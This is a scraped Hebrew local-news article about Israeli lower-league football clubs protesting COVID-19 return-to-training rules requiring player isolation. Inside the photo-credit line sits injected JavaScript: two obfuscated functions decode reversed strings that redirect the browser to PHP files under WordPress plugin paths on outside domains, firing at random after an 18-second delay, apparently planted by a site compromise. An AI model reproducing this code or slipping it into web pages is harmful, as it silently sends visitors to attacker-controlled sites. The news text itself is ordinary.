fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

כדורגל ליגות נמוכות: חוסר ודאות לגבי קיום עונת המשחקים הקרובה

מתווה החזרה לאימונים, המחייב את השחקנים לשהות בבידוד מלא בין האימונים והמשחקים, התקבל בזעם בקבוצות ליגה א'. קבוצות ליגה ב' וג' עדיין לא קיבלו אישור להתאמן
צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

אחרי שמשרד הבריאות וההתאחדות לכדורגל הגיעו להבנות לגבי מתווה החזרה לליגת העל והליגה הלאומית, נשלח במהלך השבוע מכתב לקבוצות ליגה א' שהן יכולות לחזור להתאמן אך במתווה של בידוד מלא של השחקנים. בעלי הקבוצות זעמו על המכתב וחלקם מסרבים לחדש את האימונים עד שלא יהיה תאריך פתיחת עונה ומתווה מסודר שיבטיח את סיום העונה כולה באופן חוקי. ליגה ב' וג' עדיין לא קיבלו אישור להתאמן.

מתווה החזרה של קבוצות ליגה א' לאימונים מחייב כל קבוצה למנות "מנהל קורונה" וכן חובת נוכחות של רופא בכל אימון. על השחקנים והצוות לשהות בבידוד, ממנו יוכלו לצאת רק לאימונים ולמשחקים. למעשה, מדובר במתווה דומה לשתי הליגות המקצועניות – ליגת העל והליגה הלאומית.

בקבוצות ליגה א' זעמו על המתווה וטענו כי מדובר במתווה לא הגיוני, שכן חלק גדול מהשחקנים ובטח מהצוות המקצועי והניהולי עובדים בעבודה נוספת. "זה מתווה שמראה שההתאחדות מנותקת מהמציאות", אמר אחד מבעלי הקבוצות.

"לא יכול להיות שנתחיל את האימונים ונשלם לשחקנים ובעוד חודש או חודשיים יחליטו שהליגה לא תתקיים. אלו הוצאות כבדות שההתאחדות צריכה לתת את הדעת על כך", אמר גורם בליגה א'.

במקביל, בקבוצות ליגה ב' וג' מתקשים לעכל את העובדה ששלוש הליגות הראשונות קיבלו אישור לחזור לאימונים, ורק הן לא. הן דורשות תשובות מיו"ר ההתאחדות אורן חסון.

במכתב ששלח נציג הקבוצות, תאמר נופי, נאמר, כי הקבוצות מסכימות להיכנס למתווה דומה לקבוצות ליגה א'. "כל יום שחולף ללא אימונים הוא סכנת פציעות" נכתב בין השאר במכתב.

חדשות ספורט נוספות

כבר הורדתם את האפליקציה של הד הקריות? האפליקציה החדשה שלנו עכשיו זמינה להורדה בחינם!

להורדה למערכת אנדרואיד לחצו כאן!

לינק הורדה מחנות אפל: לחצו כאן!

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות